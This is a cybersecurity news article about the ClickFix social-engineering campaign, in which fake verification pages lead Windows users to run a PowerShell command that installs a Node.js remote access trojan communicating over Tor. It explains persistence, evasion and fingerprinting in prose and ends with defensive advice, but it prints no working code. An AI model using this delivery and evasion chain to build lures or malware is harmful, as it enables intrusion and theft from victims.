ClickFix Lure Drops Node.js RAT, Tor C2 on Windows Users
Key Takeaways A new social engineering campaign, dubbed ClickFix, is deploying a sophisticated Node.js-based Remote Access Trojan (RAT) on Windows systems. The malware establishes a covert...
Key Takeaways
- A new social engineering campaign, dubbed ClickFix, is deploying a sophisticated Node.js-based Remote Access Trojan (RAT) on Windows systems.
- The malware establishes a covert communication channel via the Tor network, making C2 infrastructure difficult to trace.
- This iteration of ClickFix leverages a modular, memory-resident RAT architecture, enhancing its stealth and evasion capabilities.
- The threat actors operate a Malware-as-a-Service (MaaS) platform, accidentally exposing an administrative panel that revealed extensive operational features.
Windows users are currently facing a new wave of cyberattacks employing a Node.js-based Remote Access Trojan (RAT), distributed through a social engineering tactic known as ClickFix. Attackers manipulate victims with a deceptive browser verification page, compelling them to execute a concealed command that surreptitiously installs the RAT onto their systems.
Table Of Content
Once established, the malware communicates with its operators via the Tor network. This obfuscation masks traffic, rendering the attacker’s command-and-control (C2) infrastructure extremely challenging to trace or dismantle, as detailed by Netskope Threat Labs.
Evolution of the ClickFix Campaign
The ClickFix delivery method first gained prominence in early 2025. At that time, threat actors utilized it to distribute established malware families such as LegionLoader and LummaStealer to compromise machines.
The technique involves presenting a fabricated CAPTCHA or identity verification page. Users are then instructed to manually copy and execute a command from their clipboard.
In the most recent campaign, this command initiates a base64-encoded PowerShell script. This script downloads a malicious installer file, named NodeServer-Setup-Full.msi, from a fraudulent domain and proceeds to install it silently in the background, without any visible user prompts.
Researchers at Netskope Threat Labs have extensively monitored this campaign. They highlight that its overall design exhibits a significantly higher level of sophistication compared to previous ClickFix operations.
Advanced Modular RAT Architecture
The RAT itself is constructed upon a modular Node.js framework. This design means that its most potent functionalities are never persistently stored on the victim’s hard drive. Instead, these capabilities are delivered entirely in memory, only after the malware successfully establishes a connection to its C2 server. This approach significantly enhances its ability to bypass conventional security scans.
A particularly concerning aspect of this campaign is the robust criminal infrastructure supporting it. The attackers have developed a Malware-as-a-Service (MaaS) platform, enabling multiple operators to access and deploy the RAT against their own targets.
An operational security lapse by the threat actors inadvertently exposed the server-side administrative panel. This exposure revealed features such as tracking cryptocurrency wallets, managing multiple operators with role-based access controls, pushing custom modules to infected machines, and sending real-time Telegram alerts upon new victim connections.
Furthermore, the malware meticulously profiles each compromised machine. It gathers details including the operating system version, hardware specifications, geographic location, external IP address, and a comprehensive list of active security tools. This fingerprinting process aids operators in determining which victims warrant further exploitation.
The malware actively scans for over 30 antivirus and endpoint security products, including prominent solutions like CrowdStrike, Kaspersky, SentinelOne, and Windows Defender.
How the Infection Persists and Communicates
Upon execution of the MSI installer, the malware extracts its components into the %LOCALAPPDATA%LogicOptimizer folder. It then establishes a persistence mechanism by registering an entry under the Windows Registry Run key, ensuring automatic startup with each user login.
The malware leverages conhost.exe in headless mode to discreetly launch Node.js, rendering the entire process invisible to the user. This method prevents the appearance of taskbar or window alerts that might raise suspicion and expose the infection.
Before initiating communication with its C2 server, the malware undergoes several layers of decryption, utilizing AES-256-CBC and XOR methods to fully reveal its configuration data. The encryption keys are dynamically reshuffled with every execution, effectively thwarting static analysis attempts by reverse engineers. Once decrypted, the configuration uncovers a .onion Tor hidden service address designated as the C2 server.
To establish this connection, the malware downloads the Tor Expert Bundle directly from the official Tor Project website and creates a SOCKS5 proxy on the local machine. It then connects using gRPC, a streaming protocol facilitating real-time, bidirectional communication between the compromised system and the C2 operator.
All theft modules and commands are transmitted from the server as JavaScript strings, executed within a Node.js sandbox in memory, and are never written to disk. A built-in watchdog process continuously monitors the connection, automatically restarting it if it drops.
What You Should Do
- Monitor endpoints for unusual Node.js or
conhost.exeprocesses running in unexpected contexts. - Inspect network traffic for any anomalous Tor connections or outbound communications to
.oniondomains. - Regularly review Windows Registry Run keys for new or suspicious entries that establish persistence.
- Configure firewalls and network proxies to block outbound connections to known
.oniondomains. - Implement security policies to flag or block MSI files silently downloaded via PowerShell scripts.
- Conduct regular user awareness training to educate employees about social engineering tactics, particularly those involving deceptive browser verification pages and instructions to run unfamiliar commands.
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.



No Comment! Be the first one.